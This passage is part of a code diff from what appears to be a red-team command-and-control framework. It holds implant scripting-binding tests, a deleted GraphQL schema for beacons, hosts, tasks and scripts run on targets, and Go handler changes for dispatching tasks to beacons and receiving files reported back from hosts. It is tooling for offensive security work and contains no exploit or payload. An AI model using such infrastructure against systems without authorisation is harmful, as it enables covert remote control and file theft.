}, + crypto_bindings: TestCase { + tome: Tome { + eldritch: String::from("print(dir(crypto))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["aes_decrypt_file", "aes_encrypt_file", "decode_b64", "encode_b64", "from_json", "hash_file", "to_json"]"#), + want_error: None, + }, + time_bindings: TestCase { + tome: Tome { + eldritch: String::from("print(dir(time))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["format_to_epoch", "format_to_readable", "now", "sleep"]"#), + want_error: None, + }, + } + + #[tokio::test(flavor = "multi_thread", worker_threads = 128)] + async fn test_library_async() -> anyhow::Result<()> { + // just using a temp file for its path + let tmp_file = NamedTempFile::new()?; + let path = String::from(tmp_file.path().to_str().unwrap()) + .clone() + .replace("\\", "\\\\"); + let eldritch = + format!(r#"file.download("https://www.google.com/", "{path}"); print("ok")"#); + let (runtime, output) = Runtime::new(); + let t = tokio::task::spawn_blocking(move || { + runtime.run(Tome { + eldritch, + parameters: HashMap::new(), + file_names: Vec::new(), + }); + }); + assert!(t.await.is_ok()); + + let out = output.collect(); + let err = output.collect_errors().pop(); + assert!( + err.is_none(), + "failed with err {}", + err.unwrap().to_string() + ); + assert!(tmp_file.as_file().metadata().unwrap().len() > 5); + assert_eq!("ok", out.join("")); + Ok(()) + } +} diff --git a/implants/lib/tavern/graphql/schema.graphql b/implants/lib/tavern/graphql/schema.graphql deleted file mode 100644 index 0b916671f..000000000 --- a/implants/lib/tavern/graphql/schema.graphql +++ /dev/null @@ -1,1081 +0,0 @@ -directive @requireRole(role: Role!) on FIELD_DEFINITION - -enum Role { - ADMIN - USER -}directive @goField(forceResolver: Boolean, name: String) on FIELD_DEFINITION | INPUT_FIELD_DEFINITION -directive @goModel(model: String, models: [String!]) on OBJECT | INPUT_OBJECT | SCALAR | ENUM | INTERFACE | UNION -type Beacon implements Node { - id: ID! - """A human readable identifier for the beacon.""" - name: String! - """The identity the beacon is authenticated as (e.g. 'root')""" - principal: String - """Unique identifier for the beacon. Unique to each instance of the beacon.""" - identifier: String! - """Identifies the agent that the beacon is running as (e.g. 'imix').""" - agentIdentifier: String - """Timestamp of when a task was last claimed or updated for the beacon.""" - lastSeenAt: Time - """Host this beacon is running on.""" - host: Host! - """Tasks that have been assigned to the beacon.""" - tasks: [Task!] -} -"""Ordering options for Beacon connections""" -input BeaconOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Beacons.""" - field: BeaconOrderField! -} -"""Properties by which Beacon connections can be ordered.""" -enum BeaconOrderField { - LAST_SEEN_AT -} -""" -BeaconWhereInput is used for filtering Beacon objects. -Input was generated by ent. -""" -input BeaconWhereInput { - not: BeaconWhereInput - and: [BeaconWhereInput!] - or: [BeaconWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """principal field predicates""" - principal: String - principalNEQ: String - principalIn: [String!] - principalNotIn: [String!] - principalGT: String - principalGTE: String - principalLT: String - principalLTE: String - principalContains: String - principalHasPrefix: String - principalHasSuffix: String - principalIsNil: Boolean - principalNotNil: Boolean - principalEqualFold: String - principalContainsFold: String - """identifier field predicates""" - identifier: String - identifierNEQ: String - identifierIn: [String!] - identifierNotIn: [String!] - identifierGT: String - identifierGTE: String - identifierLT: String - identifierLTE: String - identifierContains: String - identifierHasPrefix: String - identifierHasSuffix: String - identifierEqualFold: String - identifierContainsFold: String - """agent_identifier field predicates""" - agentIdentifier: String - agentIdentifierNEQ: String - agentIdentifierIn: [String!] - agentIdentifierNotIn: [String!] - agentIdentifierGT: String - agentIdentifierGTE: String - agentIdentifierLT: String - agentIdentifierLTE: String - agentIdentifierContains: String - agentIdentifierHasPrefix: String - agentIdentifierHasSuffix: String - agentIdentifierIsNil: Boolean - agentIdentifierNotNil: Boolean - agentIdentifierEqualFold: String - agentIdentifierContainsFold: String - """last_seen_at field predicates""" - lastSeenAt: Time - lastSeenAtNEQ: Time - lastSeenAtIn: [Time!] - lastSeenAtNotIn: [Time!] - lastSeenAtGT: Time - lastSeenAtGTE: Time - lastSeenAtLT: Time - lastSeenAtLTE: Time - lastSeenAtIsNil: Boolean - lastSeenAtNotNil: Boolean - """host edge predicates""" - hasHost: Boolean - hasHostWith: [HostWhereInput!] - """tasks edge predicates""" - hasTasks: Boolean - hasTasksWith: [TaskWhereInput!] -} -""" -CreateQuestInput is used for create Quest object. -Input was generated by ent. -""" -input CreateQuestInput { - """Name of the quest""" - name: String! - """Value of parameters that were specified for the quest (as a JSON string).""" - parameters: String - tomeID: ID! -} -""" -CreateTagInput is used for create Tag object. -Input was generated by ent. -""" -input CreateTagInput { - """Name of the tag""" - name: String! - """Describes the type of tag this is""" - kind: TagKind! - hostIDs: [ID!] -} -""" -CreateTomeInput is used for create Tome object. -Input was generated by ent. -""" -input CreateTomeInput { - """Name of the tome""" - name: String! - """Information about the tome""" - description: String! - """JSON string describing what parameters are used with the tome""" - paramDefs: String - """Eldritch script that will be executed when the tome is run""" - eldritch: String! - fileIDs: [ID!] -} -""" -Define a Relay Cursor type: -https://relay.dev/graphql/connections.htm#sec-Cursor -""" -scalar Cursor -type File implements Node { - id: ID! - """Timestamp of when this ent was created""" - createdAt: Time! - """Timestamp of when this ent was last updated""" - lastModifiedAt: Time! - """The name of the file, used to reference it for downloads""" - name: String! - """The size of the file in bytes""" - size: Int! - """A SHA3 digest of the content field""" - hash: String! -} -"""Ordering options for File connections""" -input FileOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Files.""" - field: FileOrderField! -} -"""Properties by which File connections can be ordered.""" -enum FileOrderField { - CREATED_AT - LAST_MODIFIED_AT - NAME - SIZE -} -""" -FileWhereInput is used for filtering File objects. -Input was generated by ent. -""" -input FileWhereInput { - not: FileWhereInput - and: [FileWhereInput!] - or: [FileWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """created_at field predicates""" - createdAt: Time - createdAtNEQ: Time - createdAtIn: [Time!] - createdAtNotIn: [Time!] - createdAtGT: Time - createdAtGTE: Time - createdAtLT: Time - createdAtLTE: Time - """last_modified_at field predicates""" - lastModifiedAt: Time - lastModifiedAtNEQ: Time - lastModifiedAtIn: [Time!] - lastModifiedAtNotIn: [Time!] - lastModifiedAtGT: Time - lastModifiedAtGTE: Time - lastModifiedAtLT: Time - lastModifiedAtLTE: Time - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """size field predicates""" - size: Int - sizeNEQ: Int - sizeIn: [Int!] - sizeNotIn: [Int!] - sizeGT: Int - sizeGTE: Int - sizeLT: Int - sizeLTE: Int - """hash field predicates""" - hash: String - hashNEQ: String - hashIn: [String!] - hashNotIn: [String!] - hashGT: String - hashGTE: String - hashLT: String - hashLTE: String - hashContains: String - hashHasPrefix: String - hashHasSuffix: String - hashEqualFold: String - hashContainsFold: String -} -type Host implements Node { - id: ID! - """Unique identifier for the host. Unique to each host.""" - identifier: String! - """A human readable identifier for the host.""" - name: String - """Primary interface IP address reported by the agent.""" - primaryIP: String - """Platform the agent is operating on.""" - platform: HostPlatform! - """Timestamp of when a task was last claimed or updated for the host.""" - lastSeenAt: Time - """Tags used to group this host with other hosts.""" - tags: [Tag!] - """Beacons that are present on this host system.""" - beacons: [Beacon!] -} -"""Ordering options for Host connections""" -input HostOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Hosts.""" - field: HostOrderField! -} -"""Properties by which Host connections can be ordered.""" -enum HostOrderField { - LAST_SEEN_AT -} -"""HostPlatform is enum for the field platform""" -enum HostPlatform @goModel(model: "realm.pub/tavern/internal/ent/host.Platform") { - Windows - Linux - MacOS - BSD - Unknown -} -""" -HostWhereInput is used for filtering Host objects. -Input was generated by ent. -""" -input HostWhereInput { - not: HostWhereInput - and: [HostWhereInput!] - or: [HostWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """identifier field predicates""" - identifier: String - identifierNEQ: String - identifierIn: [String!] - identifierNotIn: [String!] - identifierGT: String - identifierGTE: String - identifierLT: String - identifierLTE: String - identifierContains: String - identifierHasPrefix: String - identifierHasSuffix: String - identifierEqualFold: String - identifierContainsFold: String - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameIsNil: Boolean - nameNotNil: Boolean - nameEqualFold: String - nameContainsFold: String - """primary_ip field predicates""" - primaryIP: String - primaryIPNEQ: String - primaryIPIn: [String!] - primaryIPNotIn: [String!] - primaryIPGT: String - primaryIPGTE: String - primaryIPLT: String - primaryIPLTE: String - primaryIPContains: String - primaryIPHasPrefix: String - primaryIPHasSuffix: String - primaryIPIsNil: Boolean - primaryIPNotNil: Boolean - primaryIPEqualFold: String - primaryIPContainsFold: String - """platform field predicates""" - platform: HostPlatform - platformNEQ: HostPlatform - platformIn: [HostPlatform!] - platformNotIn: [HostPlatform!] - """last_seen_at field predicates""" - lastSeenAt: Time - lastSeenAtNEQ: Time - lastSeenAtIn: [Time!] - lastSeenAtNotIn: [Time!] - lastSeenAtGT: Time - lastSeenAtGTE: Time - lastSeenAtLT: Time - lastSeenAtLTE: Time - lastSeenAtIsNil: Boolean - lastSeenAtNotNil: Boolean - """tags edge predicates""" - hasTags: Boolean - hasTagsWith: [TagWhereInput!] - """beacons edge predicates""" - hasBeacons: Boolean - hasBeaconsWith: [BeaconWhereInput!] -} -""" -An object with an ID. -Follows the [Relay Global Object Identification Specification](https://relay.dev/graphql/objectidentification.htm) -""" -interface Node @goModel(model: "realm.pub/tavern/internal/ent.Noder") { - """The id of the object.""" - id: ID! -} -"""Possible directions in which to order a list of items when provided an `orderBy` argument.""" -enum OrderDirection { - """Specifies an ascending order for a given `orderBy` argument.""" - ASC - """Specifies a descending order for a given `orderBy` argument.""" - DESC -} -""" -Information about pagination in a connection. -https://relay.dev/graphql/connections.htm#sec-undefined.PageInfo -""" -type PageInfo { - """When paginating forwards, are there more items?""" - hasNextPage: Boolean! - """When paginating backwards, are there more items?""" - hasPreviousPage: Boolean! - """When paginating backwards, the cursor to continue.""" - startCursor: Cursor - """When paginating forwards, the cursor to continue.""" - endCursor: Cursor -} -type Query { - """Fetches an object given its ID.""" - node( - """ID of the object.""" - id: ID! - ): Node - """Lookup nodes by a list of IDs.""" - nodes( - """The list of node IDs.""" - ids: [ID!]! - ): [Node]! -} -type Quest implements Node { - id: ID! - """Timestamp of when this ent was created""" - createdAt: Time! - """Timestamp of when this ent was last updated""" - lastModifiedAt: Time! - """Name of the quest""" - name: String! - """Value of parameters that were specified for the quest (as a JSON string).""" - parameters: String - """Tome that this quest will be executing""" - tome: Tome! - """Bundle file that the executing tome depends on (if any)""" - bundle: File - """Tasks tracking the status and output of individual tome execution on targets""" - tasks: [Task!] - """User that created the quest if available.""" - creator: User -} -"""Ordering options for Quest connections""" -input QuestOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Quests.""" - field: QuestOrderField! -} -"""Properties by which Quest connections can be ordered.""" -enum QuestOrderField { - CREATED_AT - LAST_MODIFIED_AT - NAME -} -""" -QuestWhereInput is used for filtering Quest objects. -Input was generated by ent. -""" -input QuestWhereInput { - not: QuestWhereInput - and: [QuestWhereInput!] - or: [QuestWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """created_at field predicates""" - createdAt: Time - createdAtNEQ: Time - createdAtIn: [Time!] - createdAtNotIn: [Time!] - createdAtGT: Time - createdAtGTE: Time - createdAtLT: Time - createdAtLTE: Time - """last_modified_at field predicates""" - lastModifiedAt: Time - lastModifiedAtNEQ: Time - lastModifiedAtIn: [Time!] - lastModifiedAtNotIn: [Time!] - lastModifiedAtGT: Time - lastModifiedAtGTE: Time - lastModifiedAtLT: Time - lastModifiedAtLTE: Time - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """parameters field predicates""" - parameters: String - parametersNEQ: String - parametersIn: [String!] - parametersNotIn: [String!] - parametersGT: String - parametersGTE: String - parametersLT: String - parametersLTE: String - parametersContains: String - parametersHasPrefix: String - parametersHasSuffix: String - parametersIsNil: Boolean - parametersNotNil: Boolean - parametersEqualFold: String - parametersContainsFold: String - """tome edge predicates""" - hasTome: Boolean - hasTomeWith: [TomeWhereInput!] - """bundle edge predicates""" - hasBundle: Boolean - hasBundleWith: [FileWhereInput!] - """tasks edge predicates""" - hasTasks: Boolean - hasTasksWith: [TaskWhereInput!] - """creator edge predicates""" - hasCreator: Boolean - hasCreatorWith: [UserWhereInput!] -} -type Tag implements Node { - id: ID! - """Name of the tag""" - name: String! - """Describes the type of tag this is""" - kind: TagKind! - hosts: [Host!] -} -"""TagKind is enum for the field kind""" -enum TagKind @goModel(model: "realm.pub/tavern/internal/ent/tag.Kind") { - group - service -} -"""Ordering options for Tag connections""" -input TagOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Tags.""" - field: TagOrderField! -} -"""Properties by which Tag connections can be ordered.""" -enum TagOrderField { - NAME -} -""" -TagWhereInput is used for filtering Tag objects. -Input was generated by ent. -""" -input TagWhereInput { - not: TagWhereInput - and: [TagWhereInput!] - or: [TagWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """kind field predicates""" - kind: TagKind - kindNEQ: TagKind - kindIn: [TagKind!] - kindNotIn: [TagKind!] - """hosts edge predicates""" - hasHosts: Boolean - hasHostsWith: [HostWhereInput!] -} -type Task implements Node { - id: ID! - """Timestamp of when this ent was created""" - createdAt: Time! - """Timestamp of when this ent was last updated""" - lastModifiedAt: Time! - """Timestamp of when the task was claimed, null if not yet claimed""" - claimedAt: Time - """Timestamp of when execution of the task started, null if not yet started""" - execStartedAt: Time - """Timestamp of when execution of the task finished, null if not yet finished""" - execFinishedAt: Time - """Output from executing the task""" - output: String - """Error, if any, produced while executing the Task""" - error: String - quest: Quest! - beacon: Beacon! -} -"""Ordering options for Task connections""" -input TaskOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Tasks.""" - field: TaskOrderField! -} -"""Properties by which Task connections can be ordered.""" -enum TaskOrderField { - CREATED_AT - LAST_MODIFIED_AT - CLAIMED_AT - EXEC_STARTED_AT - EXEC_FINISHED_AT -} -""" -TaskWhereInput is used for filtering Task objects. -Input was generated by ent. -""" -input TaskWhereInput { - not: TaskWhereInput - and: [TaskWhereInput!] - or: [TaskWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """created_at field predicates""" - createdAt: Time - createdAtNEQ: Time - createdAtIn: [Time!] - createdAtNotIn: [Time!] - createdAtGT: Time - createdAtGTE: Time - createdAtLT: Time - createdAtLTE: Time - """last_modified_at field predicates""" - lastModifiedAt: Time - lastModifiedAtNEQ: Time - lastModifiedAtIn: [Time!] - lastModifiedAtNotIn: [Time!] - lastModifiedAtGT: Time - lastModifiedAtGTE: Time - lastModifiedAtLT: Time - lastModifiedAtLTE: Time - """claimed_at field predicates""" - claimedAt: Time - claimedAtNEQ: Time - claimedAtIn: [Time!] - claimedAtNotIn: [Time!] - claimedAtGT: Time - claimedAtGTE: Time - claimedAtLT: Time - claimedAtLTE: Time - claimedAtIsNil: Boolean - claimedAtNotNil: Boolean - """exec_started_at field predicates""" - execStartedAt: Time - execStartedAtNEQ: Time - execStartedAtIn: [Time!] - execStartedAtNotIn: [Time!] - execStartedAtGT: Time - execStartedAtGTE: Time - execStartedAtLT: Time - execStartedAtLTE: Time - execStartedAtIsNil: Boolean - execStartedAtNotNil: Boolean - """exec_finished_at field predicates""" - execFinishedAt: Time - execFinishedAtNEQ: Time - execFinishedAtIn: [Time!] - execFinishedAtNotIn: [Time!] - execFinishedAtGT: Time - execFinishedAtGTE: Time - execFinishedAtLT: Time - execFinishedAtLTE: Time - execFinishedAtIsNil: Boolean - execFinishedAtNotNil: Boolean - """output field predicates""" - output: String - outputNEQ: String - outputIn: [String!] - outputNotIn: [String!] - outputGT: String - outputGTE: String - outputLT: String - outputLTE: String - outputContains: String - outputHasPrefix: String - outputHasSuffix: String - outputIsNil: Boolean - outputNotNil: Boolean - outputEqualFold: String - outputContainsFold: String - """error field predicates""" - error: String - errorNEQ: String - errorIn: [String!] - errorNotIn: [String!] - errorGT: String - errorGTE: String - errorLT: String - errorLTE: String - errorContains: String - errorHasPrefix: String - errorHasSuffix: String - errorIsNil: Boolean - errorNotNil: Boolean - errorEqualFold: String - errorContainsFold: String - """quest edge predicates""" - hasQuest: Boolean - hasQuestWith: [QuestWhereInput!] - """beacon edge predicates""" - hasBeacon: Boolean - hasBeaconWith: [BeaconWhereInput!] -} -type Tome implements Node { - id: ID! - """Timestamp of when this ent was created""" - createdAt: Time! - """Timestamp of when this ent was last updated""" - lastModifiedAt: Time! - """Name of the tome""" - name: String! - """Information about the tome""" - description: String! - """JSON string describing what parameters are used with the tome""" - paramDefs: String - """Eldritch script that will be executed when the tome is run""" - eldritch: String! - """Any files required for tome execution that will be bundled and provided to the agent for download""" - files: [File!] -} -"""Ordering options for Tome connections""" -input TomeOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Tomes.""" - field: TomeOrderField! -} -"""Properties by which Tome connections can be ordered.""" -enum TomeOrderField { - CREATED_AT - LAST_MODIFIED_AT - NAME -} -""" -TomeWhereInput is used for filtering Tome objects. -Input was generated by ent. -""" -input TomeWhereInput { - not: TomeWhereInput - and: [TomeWhereInput!] - or: [TomeWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """created_at field predicates""" - createdAt: Time - createdAtNEQ: Time - createdAtIn: [Time!] - createdAtNotIn: [Time!] - createdAtGT: Time - createdAtGTE: Time - createdAtLT: Time - createdAtLTE: Time - """last_modified_at field predicates""" - lastModifiedAt: Time - lastModifiedAtNEQ: Time - lastModifiedAtIn: [Time!] - lastModifiedAtNotIn: [Time!] - lastModifiedAtGT: Time - lastModifiedAtGTE: Time - lastModifiedAtLT: Time - lastModifiedAtLTE: Time - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """description field predicates""" - description: String - descriptionNEQ: String - descriptionIn: [String!] - descriptionNotIn: [String!] - descriptionGT: String - descriptionGTE: String - descriptionLT: String - descriptionLTE: String - descriptionContains: String - descriptionHasPrefix: String - descriptionHasSuffix: String - descriptionEqualFold: String - descriptionContainsFold: String - """param_defs field predicates""" - paramDefs: String - paramDefsNEQ: String - paramDefsIn: [String!] - paramDefsNotIn: [String!] - paramDefsGT: String - paramDefsGTE: String - paramDefsLT: String - paramDefsLTE: String - paramDefsContains: String - paramDefsHasPrefix: String - paramDefsHasSuffix: String - paramDefsIsNil: Boolean - paramDefsNotNil: Boolean - paramDefsEqualFold: String - paramDefsContainsFold: String - """eldritch field predicates""" - eldritch: String - eldritchNEQ: String - eldritchIn: [String!] - eldritchNotIn: [String!] - eldritchGT: String - eldritchGTE: String - eldritchLT: String - eldritchLTE: String - eldritchContains: String - eldritchHasPrefix: String - eldritchHasSuffix: String - eldritchEqualFold: String - eldritchContainsFold: String - """files edge predicates""" - hasFiles: Boolean - hasFilesWith: [FileWhereInput!] -} -""" -UpdateBeaconInput is used for update Beacon object. -Input was generated by ent. -""" -input UpdateBeaconInput { - hostID: ID -} -""" -UpdateHostInput is used for update Host object. -Input was generated by ent. -""" -input UpdateHostInput { - """A human readable identifier for the host.""" - name: String - clearName: Boolean - addTagIDs: [ID!] - removeTagIDs: [ID!] - clearTags: Boolean - addBeaconIDs: [ID!] - removeBeaconIDs: [ID!] - clearBeacons: Boolean -} -""" -UpdateTagInput is used for update Tag object. -Input was generated by ent. -""" -input UpdateTagInput { - """Name of the tag""" - name: String - """Describes the type of tag this is""" - kind: TagKind - addHostIDs: [ID!] - removeHostIDs: [ID!] - clearHosts: Boolean -} -""" -UpdateUserInput is used for update User object. -Input was generated by ent. -""" -input UpdateUserInput { - """The name displayed for the user""" - name: String - """URL to the user's profile photo.""" - photoURL: String - """True if the user is active and able to authenticate""" - isActivated: Boolean - """True if the user is an Admin""" - isAdmin: Boolean -} -type User implements Node { - id: ID! - """The name displayed for the user""" - name: String! - """URL to the user's profile photo.""" - photoURL: String! - """True if the user is active and able to authenticate""" - isActivated: Boolean! - """True if the user is an Admin""" - isAdmin: Boolean! -} -""" -UserWhereInput is used for filtering User objects. -Input was generated by ent. -""" -input UserWhereInput { - not: UserWhereInput - and: [UserWhereInput!] - or: [UserWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """photo_url field predicates""" - photoURL: String - photoURLNEQ: String - photoURLIn: [String!] - photoURLNotIn: [String!] - photoURLGT: String - photoURLGTE: String - photoURLLT: String - photoURLLTE: String - photoURLContains: String - photoURLHasPrefix: String - photoURLHasSuffix: String - photoURLEqualFold: String - photoURLContainsFold: String - """is_activated field predicates""" - isActivated: Boolean - isActivatedNEQ: Boolean - """is_admin field predicates""" - isAdmin: Boolean - isAdminNEQ: Boolean -} -input ClaimTasksInput { - """The identity the beacon is authenticated as (e.g. 'root')""" - principal: String! - - """The hostname of the system the beacon is running on.""" - hostname: String! - - """The platform the agent is operating on.""" - hostPlatform: HostPlatform! - - """The IP address of the hosts primary interface (if available).""" - hostPrimaryIP: String - - """Unique identifier of the beacon, each running instance will be different.""" - beaconIdentifier: String! - - """Unique identifier of the underlying host system the beacon is running on.""" - hostIdentifier: String! - - """Name of the agent program the beacon is running as (e.g. 'imix')""" - agentIdentifier: String! -} - -input SubmitTaskResultInput { - """ID of the task to submit results for.""" - taskID: ID! - - """Timestamp of when the task execution began. Format as RFC3339Nano.""" - execStartedAt: Time! - - """Timestamp of when the task execution finished (set only if it has completed). Format as RFC3339Nano.""" - execFinishedAt: Time - - """ - Output captured as the result of task execution. - Submitting multiple outputs will result in appending new output to the previous output. - """ - output: String! - - """Error message captured as the result of task execution failure.""" - error: String -} -type Mutation { - ### - # Quest - ### - createQuest(beaconIDs: [ID!]!, input: CreateQuestInput!): Quest @requireRole(role: USER) - - ### - # Beacon - ### - updateBeacon(beaconID: ID!, input: UpdateBeaconInput!): Beacon! @requireRole(role: USER) - - ### - # Host - ### - updateHost(hostID: ID!, input: UpdateHostInput!): Host! @requireRole(role: USER) - - ### - # Tag - ### - createTag(input: CreateTagInput!): Tag! @requireRole(role: ADMIN) - updateTag(tagID: ID!, input: UpdateTagInput!): Tag! @requireRole(role: USER) - - ### - # Task - ### - claimTasks(input: ClaimTasksInput!,): [Task!]! - submitTaskResult(input: SubmitTaskResultInput!,): Task - - ### - # Tome - ### - createTome(input: CreateTomeInput!,): Tome! @requireRole(role: USER) - - ### - # User - ### - updateUser(userID: ID!, input: UpdateUserInput!): User @requireRole(role: ADMIN) -} -extend type Query { - files(where: FileWhereInput): [File!]! @requireRole(role: USER) - quests(where: QuestWhereInput): [Quest!]! @requireRole(role: USER) - tasks(where: TaskWhereInput): [Task!]! @requireRole(role: USER) - beacons(where: BeaconWhereInput): [Beacon!]! @requireRole(role: USER) - hosts(where: HostWhereInput): [Host!]! @requireRole(role: USER) - tags(where: TagWhereInput): [Tag!]! @requireRole(role: USER) - tomes(where: TomeWhereInput): [Tome!]! @requireRole(role: USER) - users(where: UserWhereInput): [User!]! @requireRole(role: USER) - me: User! -} -scalar Time diff --git a/tavern/internal/c2/api_claim_tasks.go b/tavern/internal/c2/api_claim_tasks.go index f5d4baa81..53c12f42a 100644 --- a/tavern/internal/c2/api_claim_tasks.go +++ b/tavern/internal/c2/api_claim_tasks.go @@ -10,6 +10,7 @@ import ( "google.golang.org/grpc/codes" "google.golang.org/grpc/status" "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/task" "realm.pub/tavern/internal/namegen" @@ -207,11 +208,13 @@ func (srv *Server) ClaimTasks(ctx context.Context, req *c2pb.ClaimTasksRequest) claimedFileNames = append(claimedFileNames, f.Name) } resp.Tasks = append(resp.Tasks, &c2pb.Task{ - Id: int64(claimedTask.ID), - Eldritch: claimedTome.Eldritch, - Parameters: params, - FileNames: claimedFileNames, - QuestName: claimedQuest.Name, + Id: int64(claimedTask.ID), + QuestName: claimedQuest.Name, + Tome: &epb.Tome{ + Eldritch: claimedTome.Eldritch, + Parameters: params, + FileNames: claimedFileNames, + }, }) } diff --git a/tavern/internal/c2/api_report_file.go b/tavern/internal/c2/api_report_file.go index 1b6439af1..f6d755aaf 100644 --- a/tavern/internal/c2/api_report_file.go +++ b/tavern/internal/c2/api_report_file.go @@ -36,28 +36,31 @@ func (srv *Server) ReportFile(stream c2pb.C2_ReportFileServer) error { } // Collect args + if req.Chunk == nil { + continue + } if taskID == 0 { taskID = req.GetTaskId() } if path == "" { - path = req.GetPath() + path = req.Chunk.GetPath() } if owner == "" { - owner = req.GetOwner() + owner = req.Chunk.GetOwner() } if group == "" { - group = req.GetGroup() + group = req.Chunk.GetGroup() } if permissions == "" { - permissions = req.GetPermissions() + permissions = req.Chunk.GetPermissions() } if size == 0 { - size = int(req.GetSize()) + size = int(req.Chunk.GetSize()) } if hash == "" { - hash = req.GetSha3_256Hash() + hash = req.Chunk.GetSha3_256Hash() } - content = append(content, req.GetChunk()...) + content = append(content, req.Chunk.GetChunk()...) } // Input Validation diff --git a/tavern/internal/c2/api_report_file_test.go b/tavern/internal/c2/api_report_file_test.go index 130666784..92fa123d8 100644 --- a/tavern/internal/c2/api_report_file_test.go +++ b/tavern/internal/c2/api_report_file_test.go @@ -13,6 +13,7 @@ import ( "google.golang.org/protobuf/testing/protocmp" "realm.pub/tavern/internal/c2/c2pb" "realm.pub/tavern/internal/c2/c2test" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent" ) @@ -85,7 +86,9 @@ func TestReportFile(t *testing.T) { name: "MissingTaskID", reqs: []*c2pb.ReportFileRequest{ { - Path: "/test", + Chunk: &epb.File{ + Path: "/test", + }, }, }, wantCode: codes.InvalidArgument, @@ -103,14 +106,16 @@ func TestReportFile(t *testing.T) { name: "NewFile_Single", reqs: []*c2pb.ReportFileRequest{ { - TaskId: int64(existingTasks[2].ID), - Path: "/new/file", - Owner: "root", - Group: "wheel", - Permissions: "0664", - Size: 999999, - Sha3_256Hash: "I_AM_IGNORED", - Chunk: []byte("death"), + TaskId: int64(existingTasks[2].ID), + Chunk: &epb.File{ + Path: "/new/file", + Owner: "root", + Group: "wheel", + Permissions: "0664", + Size: 999999, + Sha3_256Hash: "I_AM_IGNORED", + Chunk: []byte("death"), + }, }, }, host: existingHosts[0], @@ -134,11 +139,15 @@ func TestReportFile(t *testing.T) { reqs: []*c2pb.ReportFileRequest{ { TaskId: int64(existingTasks[2].ID), - Path: "/another/new/file", - Chunk: []byte("death"), + Chunk: &epb.File{ + Chunk: []byte("death"), + Path: "/another/new/file", + }, }, { - Chunk: []byte("note"), + Chunk: &epb.File{ + Chunk: []byte("note"), + }, }, }, host: existingHosts[0], @@ -160,8 +169,10 @@ func TestReportFile(t *testing.T) { reqs: []*c2pb.ReportFileRequest{ { TaskId: int64(existingTasks[2].ID), - Path: "/another/new/file", - Chunk: []byte("replaced"), + Chunk: &epb.File{ + Path: "/another/new/file", + Chunk: []byte("replaced"), + }, }, }, host: existingHosts[0], @@ -183,8 +194,10 @@ func TestReportFile(t *testing.T) { reqs: []*c2pb.ReportFileRequest{ { TaskId: int64(existingTasks[3].ID), - Path: "/no/other/files", - Chunk: []byte("meow"), + Chunk: &epb.File{ + Path: "/no/other/files", + Chunk: []byte("meow"), + }, }, }, host: existingHosts[1], diff --git a/tavern/internal/c2/api_report_process_list.go b/tavern/internal/c2/api_report_process_list.go index c062377df..049cc592b 100644 --- a/tavern/internal/c2/api_report_process_list.go +++ 